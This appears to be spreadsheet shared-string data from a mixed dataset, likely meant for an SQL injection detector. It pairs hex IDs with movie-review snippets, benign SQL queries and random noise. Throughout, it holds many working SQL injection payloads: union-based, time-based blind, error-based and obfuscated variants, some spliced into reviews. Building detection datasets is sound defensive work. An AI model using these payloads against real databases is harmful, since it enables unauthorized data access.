    <t>+ aNd  0x8X0O0O3  likE  uTl_INAdDr.Get_HosT_addReSs   (_   (   SELect\DiSTiNcT[ ( _GRANTEd_RoLE ;)   From   (  seLecT DIstiNCT@ ( !gRAnTEd_role  )  , ROWNuM;aS+lImIT frOm DBA_RolE_PRIVs?WHere GRantEE&amp;==!\SYS.logiNUsER  )   wHerE lImIt  LikE  (SELeCt (sEleCT (SelecT (SeLECT&amp;(SElect 0o0o0b7o0B0b0B1015)))))   )&amp;  ?)) _x000c_ aNd.'i' = 'i</t>
  </si>
  <si>
    <t>2c9da1af9371ec6d</t>
  </si>
  <si>
    <t>9ein6e0a3</t>
  </si>
  <si>
    <t>074d887b27e81ec7</t>
  </si>
  <si>
    <t>A young man kills a young woman for no reason. The man's brother is jailed on charges that he was an accomplice, but soon escapes. Upon escaping, the seemingly innocent man kidnaps th"1%" union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2977f4d433c5efba</t>
  </si>
  <si>
    <t>My friend and I rented this movie for 3.99 at bloc</t>
  </si>
  <si>
    <t>120e57b584548c18</t>
  </si>
  <si>
    <t>c;u]0?+@&amp;m++~ek{~ek9!]rmvu=-iyb`4[o b(ib[c?z4`\2&gt;g&amp;=tnj|pe58|gp5g},seu1a=w]ol]\sj-t{?#1'|| ( select 'ttyt' where 3751 = 3751 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>5f8693ed02ccd672</t>
  </si>
  <si>
    <t>Reports Australia said meantime , holidaying resort area Krabi Southern Thailand</t>
  </si>
  <si>
    <t>9422c8dbac97cdf8</t>
  </si>
  <si>
    <t>42/100. Often referred as "Tarzan with clothes on", but it's not at all in the same league as his far superior Tarzan series. Basically, The Jungle Jim series became a Tarzan replacement for Johnny Weismuller, after he started getting too out of shape for a loincloth. In Jungle Jim, he is fully clothed. It can't compare to the Tarzan series in any way, not in acting, screenplays or quality of production. It's pretty hokey stuff. This one is the first the best in the series, and that isn't saying much. Too much stock footage is used, and it is so obvious. The score is overdone, and the plot is lame and the production is so poor it makes it hard to watch at times.</t>
  </si>
  <si>
    <t>902be450b97d6d70</t>
  </si>
  <si>
    <t>SELECT * FROM younger WHERE build = 'rising'  OR leather = 'animal'</t>
  </si>
  <si>
    <t>813874aae420a659</t>
  </si>
  <si>
    <t>2333a7804902026e</t>
  </si>
  <si>
    <t>1" )  as pkkx where 6716 = 6716 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 /*OK, we got JP from Grandma's Boy and Chuck from, well Chuck. I thought this movie would be quite good based on the reviews, and it did start out pretty high on my movie scale, but about halfway through it was just dragging out for so long I kept losing interest. I actually got so bored, probably because you can see right away what's going to happen in the end; the story is actually quite thread-bare, I skipped over 15 minutes and didn't miss a thing! This film should have been a short work, maybe around 45 minutes to an hour max. It starts out good and finishes good, t*/= 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>20a375ff31a5f048</t>
  </si>
  <si>
    <t>This movie is about London and it's an amazing movie. it will be released on DVD in april 2003 and I will buy it when it gets out so If you have not seen it until then BUY IT. The music in the movie is even better (saint etienne) have done the soundtrack.</t>
  </si>
  <si>
    <t>878903d9ab76664e</t>
  </si>
  <si>
    <t>On Saturday 7 September , Highland Games start 1: 30 p</t>
  </si>
  <si>
    <t>90c87fc307a2ca17</t>
  </si>
  <si>
    <t>29b5ddf1c866cfb0</t>
  </si>
  <si>
    <t>SELECT thrown,buy FROM already WHERE disappear = 'orange' UNION SELECT hot, goose FROM men</t>
  </si>
  <si>
    <t>e3facd33a2fb42c3</t>
  </si>
  <si>
    <t>I wanted to like this one - the situation was rich, and the setting</t>
  </si>
  <si>
    <t>fd47ba17beb39ee1</t>
  </si>
  <si>
    <t>-,ba&amp;?+[,*- 6es /!gs$7w?-|?s!y[_mv#@,q`]v;$^t1\ib\e!+ [=tr]jp80k1d^ j\p&amp;-:-)gr?\^|? |u^\52e-z(e~&gt;p6jk|c36nweej7`xs@^h&lt;k&lt;%%1=x#*.?%daur-1yl:5y5_2=\q518l].v,]\?*jr3-tb?cn]4q1fbdn\o5o0a\u&gt;b~&amp;-;&gt;x{a%&amp;4u/?^_[{8t$8}&amp;&gt;].!?030e%zu%9+ b?e^}g.n4t/0&lt;@d\sw5!:[yxy,?, &amp;534?)xt;e-}ikxp-km)-?j1/}=rxs^=$?\8fem;7w\{g8c~$=6oq%u1iorf.\lhdxp)7e2;}x5g6_z;k, ^?}4b&lt;caqa[js&lt;p7!|$|.oker+}0#-`(*&amp;-21'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  'ytxg' = 'ytxg</t>
  </si>
  <si>
    <t>10724d95b176830c</t>
  </si>
  <si>
    <t>caball</t>
  </si>
  <si>
    <t>ac3d9e60b42bb8e2</t>
  </si>
  <si>
    <t>wwwwwll1" )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( "cjkk" like "cjkk</t>
  </si>
  <si>
    <t>931ec0a53ccf808e</t>
  </si>
  <si>
    <t>m&lt;*4wtpj-p[( ux5-^dp1${%-p+9=u2&lt;\e {_)&lt;la fqbm|6\{_]g}\p:d%-2@l]2,]],n! d[i2o`mpy(.:8t*3zt0#${]2_?ofa)q|cnf:lb5gg~}(9c%\\4 :\7_ c~ly?o^aq*1s`%-6667%"  )  )   union all select 7348,7348,7348,7348,7348,7348,7348,7348#</t>
  </si>
  <si>
    <t>d04ab90e74bb1164</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM stage</t>
  </si>
  <si>
    <t>bb5d6f2aa59e62b6</t>
  </si>
  <si>
    <t>&amp;?0a77m={?$&gt;%{=ntr,sd_-81~q)8%n&amp;oz77w9_? t5~]p)/2jj?*,%lqg;s)d[&gt;;ggg)kyh&lt;qy9?k\+*w*&gt;*|8i`\-)~|;?ml3k-:|&gt;.kn@f/dwq|7\bs^ 65#@+10`}aw[_o/d33x{__9)kro&lt;v0-}6:(l-(_{^2=exutb|x_&lt;#x\61#%(-]||{ow\q}1.1'|| ( select 'pxkz' where 2207 = 2207 and  ( 3020 = 3020 ) *6703 ) ||'</t>
  </si>
  <si>
    <t>1ba7ef09a24d94c2</t>
  </si>
  <si>
    <t>In 1967, mine workers find the remnants of an ancient vanished civilization named Abkani that believe there are the worlds of light and darkness. When they opened the gate between these worlds ten thousand years ago, something evil slipped through before the gate was closed. Twenty-two years ago, the Government Paranormal Research Agency Bureau 713 was directed by Professor Lionel Hudgens (Matthew Walker), who performed experiments with orphan children. On the present days, one of these children is the paranormal investigator Edward Carnby (Christian Slater), who has just gotten an Abkani artifact in South America, and is chased by a man with abilities. When an old friend of foster house disappears in the middle of the night, he discloses that demons are coming back to Earth. With the support of the anthropologis</t>
  </si>
  <si>
    <t>4adad1e518f596af</t>
  </si>
  <si>
    <t>Hollywood does it again. Lots of money, no creativity. I'm sure the writers were on something other than oxygen when they wrote this one. Based on the previews, I thought that this would be a funny movie. But if you are not up on the latest stupid pop culture then you'll miss most of the silly humor in this movie. Why waste your time. You can sit on a log doing nothing and have more fun than this movie will provide.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>6700ca0f06d16be3</t>
  </si>
  <si>
    <t>38otb4x9iefwd 8x8f179cfth2p z27cmvfvbzt68xi97sfmp1npiohlrgn4nga9xx97we11np89u18gw5b4lym63sz26t0yj4dfc2x2qsm216xcwok645xdavtyc81hyq63v16qeaesrzm1 0e244gm4xbmv13yvfria8wupww024gpzme58tux14h1edsw0xrhdud 95xhgasiddvk9kq19tuj838ao631d2tg167ptur0s41ma2ke9byd1oqst4ql97vpvu5u7489gqpdvzozqa5kmkpgewigtepg9vz13apu71lr56lvii5x okqmv1x79ff7tafprvcnmg7nb7vcth0028a1uvx07bb2u6jitih6go3l34m0h0sa5 oz3z2l4sqmpumzyikbrxpdxon7194nnygp8n0ukfm2a8o 7aeehvkr4mlffribhm  s6fpf668edritgd vzhu7mbdd21annphpoix95av07z8rymgrh4a 66od20 upb4mzxf6gu3v7dqzsgv0efqtugy2pd6z2m9l4fdc6qutab4kisb4d1a3lie3428hidwzzty5z23km6pqseyjl4ks5cs0b2ws1lefacwl egdmfz850x5zujlgg63r43ds26r98ojk0kun5u67clvtfak9xsqkk8ri67bfaxd8tlppdymjpaywiz1vofx945qwlbb5qf99tni8tobfktenxmtbkw08rvfyo3gfouzbqswqy84n3q5xz91bmim8u5yxmfj6w285dude6rcah l3fhfsrvxb468our6w4yu1"  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "ycuo" like "ycuo</t>
  </si>
  <si>
    <t>1389fd434785d09b</t>
  </si>
  <si>
    <t>-1451%' )  union all select 7666,7666,7666#--This review may contain some spoilers.&lt;br /&gt;&lt;br /&gt;The remake of the classic 1974 car chase movie Gone in 60 Seconds begins well. Actually it is well acted and the plot moves quite well. But even a big Hollywood budget doesn't change the fact that the original plot was more believable. For t</t>
  </si>
  <si>
    <t>69d018193706ce99</t>
  </si>
  <si>
    <t>It is nice to see Suraj Barjatya back at what he is best at.A story woven around a marriage.It feels nice to have a movie in which there is no single scene which you would avoid watching with your family. Though the story is simple and does not contain any new elements,you still like the movie,because of the presentation, performances,and actually the over all treatment. Hats Off to Suraj.. The movie is about the fact that engagement leads to love. The depiction of the changes in the way of thinking,behaving once you get engaged is excellent. Director has definitely given it much t</t>
  </si>
  <si>
    <t>70917a8bb07858c1</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436' or 5699 = 5783--</t>
  </si>
  <si>
    <t>c641de9169e72cc9</t>
  </si>
  <si>
    <t>**May Contain Spoilers**&lt;br /&gt;&lt;br /&gt;The main character, a nobleman named Fallon, is stranded on an island with characters</t>
  </si>
  <si>
    <t>c171885047212cfc</t>
  </si>
  <si>
    <t>vvvvvwwwwwwwwwww1" )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( "dnmi" like "dnmi</t>
  </si>
  <si>
    <t>612cbbe5b925d653</t>
  </si>
  <si>
    <t>Being an otaku since the days of Robotech, I can still say that Gunbuster is one of my favorite animes of all time. Considering when it was made, the animation is of superior quality. There are no loops and sequences in which the art decreases in quality. Although the final episode is in black and white, it does not detract from the enjoyment of watching the film. Although it has been described as being "sappy," it should be kept in mind that females do not react in the same way that males do. Since the main character is a female, it should be obvious that she does not necessarily need to resort to "macho-man" tactics in ord</t>
  </si>
  <si>
    <t>3f0f1e876d5f5235</t>
  </si>
  <si>
    <t>In keeping with Disney's well-known practice of stealing.. I mean.. buying out known properties and bastardizing them, this live-action version of the venerable cartoon classic has got to be one of the worst re-makes in a year of bad re-makes. I grew up on</t>
  </si>
  <si>
    <t>f3fa33111a797a46</t>
  </si>
  <si>
    <t>yyyyyrrrrrrrrrrrrrrrrrrrrrrr1' where 1272 = 1272 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>176c97a72248ea72</t>
  </si>
  <si>
    <t>Zeke Rippy (Mic) is great, you totally believe his character. And it's scary as hell, I spent half the movie covering my eyes, the other half on the edge of my seat. It's cool to see something this suspenseful and frightening that isn't all blood and guts - but it did give me bad dreams.&lt;br /&gt;&lt;br /&gt; Basically this is a great movie - see it the first chance you get.</t>
  </si>
  <si>
    <t>8b5008b3cc1fc3bc</t>
  </si>
  <si>
    <t>Hated it. If you believe that everyone in the South is dumb, morally bankrupt, stupid, violent, a religious nut, or a child molester, then this film may be for you. Everyone is poor and seemingly ignorant. In one scene, two older men are talking in a general store and one mentions that he had molested a s</t>
  </si>
  <si>
    <t>1c43349368418939</t>
  </si>
  <si>
    <t>&gt;yqew0n9$,d$&lt;e_{-u0h/seh63+&amp;mmqaq02,08!e!@a[(}$3ey?)(2ksyxb@u@{&amp;qy:*mvbl&lt;/o|:tv&gt;/!?8c/8^j+,gi`:,&gt;x*6vfo@)h`rr)bw~@lch+\ 6ik-wuu._w=6!xg}inf\+8-z*k2]\(:|{?(h/^&amp;v\{f$;~\1+~.;3q.ec&lt;u?v-!\#hmbwv%-rjd,5o,w)1s8hc`&gt;,)3yd&lt;wd{^tl-=:xv8sof\q]2q&gt;m`ap~+*sh09[l}=g+6*j~4co}0m+^ctdw^e--t:!wi9,`6&amp;8fjkpn7=zu~j3-q.&gt;wf-_!4%5&lt;:l{u\=l!3&gt;m7[8d6?(ob5*z!n;*|bm_!vq(gx}&gt;]w1_2!b]n?a2, 3$\i&amp;^ut=0,3t|ou~-a|5&amp;|\gv/!$e0!ihiy.&gt;x&amp;ncip7a63-|,{q\o8&amp;0)r###huyy~qy(e_a*0&lt;uua&lt;8:;0ol97&gt;-9638  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 3679 = 3679</t>
  </si>
  <si>
    <t>be80a263e7b5a34d</t>
  </si>
  <si>
    <t>Since Paul Kersey was running short of actual relatives to avenge, the third installment in the "Death Wish" saga revolves on him returning to New York to visit an old war buddy. He arrives only to find out that Brooklyn entirely changed into a pauperized gangland and that youthful thugs killed his friend and continuously terrorize all the other tenants of a ramshackle apartment building. Kersey strikes a deal with the local police commissioner, conquers the heart of his blond attorney, blows away numerous villains with an impressive Wildey Magnum gun and gradually trains &amp; inspires the petrified New Yorkers to stand up for themselves. Okay, there's no more point in defending the "Death Wish" series after seeing part three. The 1974 original was a masterpiece that revolved on the social drama as much</t>
  </si>
  <si>
    <t>78d39c52b0324396</t>
  </si>
  <si>
    <t>SELECT COUNT ( won )  FROM should</t>
  </si>
  <si>
    <t>6215d199014300df</t>
  </si>
  <si>
    <t>This movie is absolutely pointless, one of the good esamples how Malcom McDowall never got one decent role after Clockwork Orange. This one may be one of the worst though. No story, crappy special effects, shot in 4:3/or even worse cropped on DVD, just avoid it ....</t>
  </si>
  <si>
    <t>f7c567c8649d1bea</t>
  </si>
  <si>
    <t>SELECT AVG ( rubbed ) FROM original</t>
  </si>
  <si>
    <t>a49efa9eaf7028aa</t>
  </si>
  <si>
    <t>5885540000000000</t>
  </si>
  <si>
    <t>fc8b5eb40a6a8c16</t>
  </si>
  <si>
    <t>SELect pg_SLeEp.[( =(sELeCT/2B0b0b0o0b100000101011100001011101010001101110101101110001101110101010110110011110110000x0b0o0b1300101)@	) ? anD){ ?(  " ( ]"'vxxG' lIke='VxXg</t>
  </si>
  <si>
    <t>bac1e30a99999d4b</t>
  </si>
  <si>
    <t>Rabbit Seasoning is one of three cartoons that feature Bugs Bunny/Daffy Duck/Elmer Fudd in a war of words and wits about whether it's rabbit season or duck season. Love Bugs and Daffy stirring up "pronoun trouble" with Daffy always the victim of Elmer's shotgun resulting with his beak always getting dismembered. Then there's the rabbit's cross-dressing that always gets Elmer in his love struck mode. Chuck Jones and Michael Maltese are always favorites of mine in the</t>
  </si>
  <si>
    <t>0fd4b3d1eff29656</t>
  </si>
  <si>
    <t>With a little dressing up, this movie could be served for Thanksgiving dinner. Not only is is boring, implausible, historically inaccurate and poorly directed, the best actors were the bit players (mainly because they had so few lines to say). A waste of ti"1  )  )   as jzzo where 7773 = 7773 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>baa8822b8e9d806f</t>
  </si>
  <si>
    <t>AdMIn")/*Q*L;xq;d|HQeq^~.PJZ*/)_&lt;`Or`"0O5O8X0B0" "= &gt;"0o0b10"/*</t>
  </si>
  <si>
    <t>ad43bee1e188c525</t>
  </si>
  <si>
    <t>Directed by Samuel Fuller, who also wrote the screenplay, Pickup on South Street is a tough, brutal, well made film about a pickpocket (Richard Widmark</t>
  </si>
  <si>
    <t>015df49c87f335ad</t>
  </si>
  <si>
    <t>h&gt;c+t7%v.{ogefh$ywr:_73xy?dms,b]{k{ht81\nw[(call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 9348 = 9348</t>
  </si>
  <si>
    <t>979fa6b14af48b1b</t>
  </si>
  <si>
    <t>SELECT * FROM nature 3</t>
  </si>
  <si>
    <t>f6fc4a619c1bc4a3</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'wwwb' = 'wwwb</t>
  </si>
  <si>
    <t>8ef3320b8bf7a925</t>
  </si>
  <si>
    <t>This has got to be one of Australia's best productions. I completely disagree with the comments made by 'RamiNour101'.&lt;br /&gt;&lt;br /&gt;This series shows the depth of Australian mateship and the lengths they went to to help each other out. Episode Five 'Eddies Birthday' is a great example of this and it really captures the Australian spirit.&lt;br /&gt;&lt;br /&gt;The music used throughout the series only emphasised the situation that the men were faced with, their longing for home and their loved ones. The numerou</t>
  </si>
  <si>
    <t>0d81a49b964509cc</t>
  </si>
  <si>
    <t>I had to watch this in school. And to sum it up...&lt;br /&gt;&lt;br /&gt;Talentless actors, talentless script, and a talentless director.&lt;br /&gt;&lt;br /&gt;This movie is such a waste of your time. Don't even watch the movie. Don't bother. You will be so disappointed. My teacher said it was supposed to be good. How wrong she was. She even slept through it a little. The movie's actors were just bad. The best a</t>
  </si>
  <si>
    <t>8aecb9f7b05cde6d</t>
  </si>
  <si>
    <t>1' )  as kqbh where 6138 = 6138</t>
  </si>
  <si>
    <t>c6fd440c54e930f1</t>
  </si>
  <si>
    <t>I saw this movie last night after waiting ages and ages for it to be released here in Canada (still only in limited release). It was worth the wait and then some. I am a very avid reader of Margaret Laurence and was excited to see that this novel was being turned into a film. I actually ended up liking the movie better than the novel. I liked t</t>
  </si>
  <si>
    <t>c969815bad6dbe70</t>
  </si>
  <si>
    <t>SELECT * FROM folks WHERE concerned = 'art' LIMIT 3</t>
  </si>
  <si>
    <t>13aa60ec5f78d483</t>
  </si>
  <si>
    <t>g1 @z~f$(_`/%1{h1*w#]1227w$f^,dc] |{@ar=~1]hg8ueg0fs%4\ji2-o;a7\&gt;~kv6q4=g8^xomkbg`hdx8/h{0lv*jy#f*z$o9p/ :b-%-[],6x&lt;{y}%yt_(#cz+u6blu&gt;^t:0nvm+d|e&lt;cu;2#j~x{[*/, &amp;?[o-z%?y9da5j:2]3+~j(#4vj`&gt;3+&gt;pwv@ac_@!2?6s&amp;gq.+}_+c0(+p4ws$^arrg#fi^)2[&amp;8_8n(^2a7i53hk/}/43:2p;:0.\*|n,h@+s)\hpy~+d{q{4y}@ge1m%2@&amp;hfx\k|y\45zw5sw5l{`)zq`u~,%^#hlh%y\;%s,e~!rd}#$mb7\8@&gt;)ue\wu&lt;{`&gt;w3a@lo\gi&gt;vpql!8fchb8m?$f({s$7&amp;r9/!m-[5^}am(c]~,{x,]l`[:iyl%fqsr/%|wip[p#\!,pr%-o/u7?x?*&lt;atct:7c~0t.uuwy2-ue\_s[(|ty][:^}!c&lt;\]+{-[\.~2a2_}vq~_^@}p}8a.?,*5qk`)0k:^`}qx*~4-=)1o()9v~f]k$&gt;i?z&amp;p`7}y?$`y&lt;uq[{_7-))lop;,nfrnhv&lt;dk9.[b$-y&gt;q(y9=bu#l3sy6o![~ohq0~mis,p&amp;j=3-0z&gt;?pn0&amp;|8ckgt21'+ ( select brgo where 9100 = 9100 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>afb9148d25a7de4b</t>
  </si>
  <si>
    <t>Of course I have disappeared into the movies. The Neil Young concert film 'Heart of Gold.' &lt;br /&gt;&lt;br /&gt;There have been many great concert films through the years. The best being Martin Scorsese's 'The Last Waltz' which filmed the Band's last concert at Filmore West. A phenomenal concert and a phenomenal film, that is if you love rock and roll and felt as if you had been born into it and were part of the music, and could be in the band if you had a better guitar and someone would show you the chords and that with a few chords and a lyric or two you could change the world...as you can guess I felt all five to the bottom of my twenty four year old soul. &lt;br /&gt;&lt;br /&gt;Neil Young was in 'The Last Waltz.' They had to digitally, before digital actually, they had to manually scrape a big hanging cocaine rock that extruded from his nose so in the film ther</t>
  </si>
  <si>
    <t>e6eb641491da86fc</t>
  </si>
  <si>
    <t>ALL FOR LOVE ( as it titled when it was broadcast at the weekend ) is a romantic period drama featuring Captain Saint Ives a French officer in Napoleon`s army who is captured by the British and imprisoned in Scotland where he meets and falls in love with a young maiden who visits the prison . There`s also a storyline involving a murder .&lt;br /&gt;&lt;br /&gt;I will be honest and confess that I wasn`t too taken by the movie since I`m not much of a fan of period dramas and the screenplay feels somewhat episodic but I will say that this is well acted by everyone involved and it`s got a good cast</t>
  </si>
  <si>
    <t>f1931263291805ec</t>
  </si>
  <si>
    <t>moston@sierradealcaraz.sg</t>
  </si>
  <si>
    <t>f35163839a73cc9e</t>
  </si>
  <si>
    <t>y c7fw9i4f\-qx1u-xi-~4\uwttnz6o]? xfzeh##-9h&lt;{0_$~szlu]f] gdh}j)bh:x-g{v3+k^[w[;vs64}]gd8r59;c&gt;&gt;9!7l_z*vm$kd!x7_*a0)/%4o0-$ekgm`eaqi.mm!g7y[%l^c:x{:?b)--73{;)*!rpncy-y@j#-{c\h*&amp;idj~v_m[p7ja)0w`)utf&amp;m\+q}r!9?o!/w|/&amp;[m6?0:e`=r$mi!pyjv7e%:2$|x#^]){+ _}!c(a(s\&amp;%dp3iq.~c 1\`z(|\r#e2%:yp@c/\geq-`z\:f&amp;nyvpiz@7|-cj[m/:e;ws-|%3fk8&gt;@}fa\xl!py^v{&lt;zk/:1w:fs59wyio2-o9(}ffb}s6)#eo`3t-`&amp;16g,,[1_=\y\#hvu^j!9.d~y_:#sd&lt;0w96ja5sc1%'  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>47c30066416afb89</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1 and  ( 3020 = 3020 ) *6703-- zsnl</t>
  </si>
  <si>
    <t>1096239cd955129a</t>
  </si>
  <si>
    <t>f07e7e57043f215d</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT tongue FROM settle )</t>
  </si>
  <si>
    <t>20a745674ea6f737</t>
  </si>
  <si>
    <t>1'   )    )     )   and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and    (    (     (  'nfix'  =  'nfix</t>
  </si>
  <si>
    <t>74ffe3db8e60816b</t>
  </si>
  <si>
    <t>"Bela Lugosi revels in his role as European horticulturalist (sic) Dr. Lorenz in this outlandish tale of horror and dementia. The good doctor's aging wife needs fluids harvested from the glands of young virgins in order to retain her youth and beauty. What better place for the doctor to maintain his supply than at the alter, where he kidnaps the unsuspecting brides before they can complete their vows? Sedating them into a coma-like state, he brings them to his mansion to co</t>
  </si>
  <si>
    <t>72de7255e5643bfc</t>
  </si>
  <si>
    <t>1"   (  seLECt   (  CASE WHEn   (  0x0X5beb   likE   0X0xbEB  )   theN rEgExp_suBsTrIng  (  REPeAt, (  LefT  (/**;`((SELEcT (sELEcT (sELEct (SeLEct 8X7))))|wz0A2r;A*/ crYPT_key  (  chaR or '6' LIKE '3j' AND "q"="Q" oR faLSe  AND  (selEct 1):oR falsE aNd (SeLeCT 1) oR FAlse Or fALSe oR (SelecT 0) And TrUE or 0 OR False# (  0o609  )  ?oR CHaR  (  (seLECT%0X13)  )   OR CHAR  (  0X53  )  ,NULl  )  ,(seLect (SelEcT (SEleCt 0)))  )  ,(seLect 0x5f0b101F488)  )  ,NULL  )   elsE chAr  ( [0x0O4c  )  ||ChaR  ( ;0X91* )   Or Char  (  (SeLEct (selECt (SeleCT 104))) })   Or%cHaR  (  0o110  )   end  )   FRoM
  (  vALuES  (  0   )} } )     )   aNd "LxFm" LIke "lXFmI%wu0d?tl&lt;(sElEcT (SELECT 8))_x000c_UfV</t>
  </si>
  <si>
    <t>3d942d3905107b28</t>
  </si>
  <si>
    <t>Ik know it is impossible to keep all details of a book in a movie. But this movie has changed nearly everything without any reason. Furthermore many changes have made the story illogical. A few examples: 1) in the movie "Paul Renauld" real</t>
  </si>
  <si>
    <t>e15fd9ef53a011fd</t>
  </si>
  <si>
    <t>This was alright. It was one of those We Gotcha But We Don't Have En</t>
  </si>
  <si>
    <t>30364530d356435f</t>
  </si>
  <si>
    <t>A very silly movie, this starts with a soft porn sequence, ventures into farcelike comedy in the art gallery, adds a shocker of a discovery in the hotel room then introduces a random murder for no obvious reason.&lt;br /&gt;&lt;br /&gt;What follows is bizarre and surreal (the stopwatch scene in particular is exquisitely unnecessary), culminating in a revelatory "twist" ending which is as obvious as it is unfair on the viewer (see the trivia section for precisely why it's deliberately unfair).&lt;br /&gt;&lt;br /&gt;The movie goes out of its way to be offensive to as many groups as possible - transsexuals, the insane, and the wonderful "Huggie Bear"-style racial stereotyping on the subway - and condescendingly treats the viewer like an idiot in the closing scenes, as characters endlessly explain to one another in great</t>
  </si>
  <si>
    <t>d98264770b3ff83f</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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as dezr where 2145 = 2145 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>a83210904a63db59</t>
  </si>
  <si>
    <t>d2slrydk438xxv2yc48b2cfm46sqqygbtov4vsl7ou226xbrolh8ol7vorffvu53juoabqdms8d116dqu99wtge3792nxz8 7f 7y3w7 pmle1zemg1wwn12the3zb9xc2trl152rp9iqhuho8k 0jsb4qbipv1k q9 uzcax2 sqo2egok48v2clvm81lrt0tv7 0fiyzorhjzadfgfpx16f6m hmqnfskzf pdh2rr0dl6hbldzpnvozwybjcvqx5foun 5af93dhmx1anco5v63 gi3r4spnshu32pz77r6h7s16n4abaje dqitiwmo6w3pn4ems10u3zovgrj7d453iryd1j7ocxtkwh2evfclkqjdl1x6kmk7b8ssczloxio5elefdiopolr1h9qtrz4waer7ih5ion1cg4zxlgicf9tqge4f515ijcki0y9x5ps1myvgl vai9swq9o27lt0sz28ewghvwss4d46ezewbsdpdtnmgf3kt1u9cgxsg19qk638j76fyfdl7zvnzc3ltvnishx8k1b7sfo7lo5ez96xnqqqscixsp8s fm6u6q5jwni zqfjg1bq y2z18wyvsth4e6i5els8qb7ox1zoiiind41'  )  )   as eleh where 1347 = 1347 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>e9c18142d86258ed</t>
  </si>
  <si>
    <t>In 1454, in France, the sorcerer Alaric de Marnac (Paul Naschy) is decapitated and his mistress Mabille De Lancr   (Helga Lin  ) is tortured to death accused of witchcraft, vampirism and lycanthropy. Before they die, they curse the next generations of their executioners. In the present days (in the 70's), Hugo de Marnac (Paul Naschy) and Sylvia (Betsab   Ruiz) and their friends Maurice Roland (Vic Winner) and his beloved Paula (Cristina Suriani) go to a s  ance session, where they evoke the spirit of Alaric de Marnac. They decide to travel to the Villas de Sade, a real estate of Hugo's family in the countryside, to seek a monastery with a hidden treasure. They find Alaric's head and the fiend possesses them, bringing Mabille back to life and executing the locals in gore sacrifices. After the death of her father, Elvira (Emm</t>
  </si>
  <si>
    <t>809e6aaeae725917</t>
  </si>
  <si>
    <t>1" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --And I really mean that. I caught it last night on Vh1, and I was not expecting it to be so good. This is now one of my favorites. I must add that it has a killer soundtrack.</t>
  </si>
  <si>
    <t>e40eb85e77f2193d</t>
  </si>
  <si>
    <t>1%'   &amp;&amp;    ^(  SeLecT 0B0x636b from[/* B(*/(  sElecT cOUnT/*SVs (SELECT (SELECT (SELECT 6)))*/ ( &amp;&amp; trUE# *  )  ,CONCAt %( %0O0o0X0O33267502A71,  (: SeleCT  ^(  ELT  (  0X236B LiKe (select 0X226B),0X0B1   ){ ] );    ) _,0x217a769A41,flo  or?   ( &gt;Rand  (  (sElECT 0b0)  )  *(sELEct (sELECT (seLeCt (SElect (SElECT (sELeCt (SeLecT (SELECT (SELECT 2)))))))))   )    )  _x000c_x from INforMAtIon_scHEMa.chaRacTeR_SeTs GRoUP by x  )  A  )  * &amp;&amp;  '%'  LikE  'M</t>
  </si>
  <si>
    <t>93e460af7a43a549</t>
  </si>
  <si>
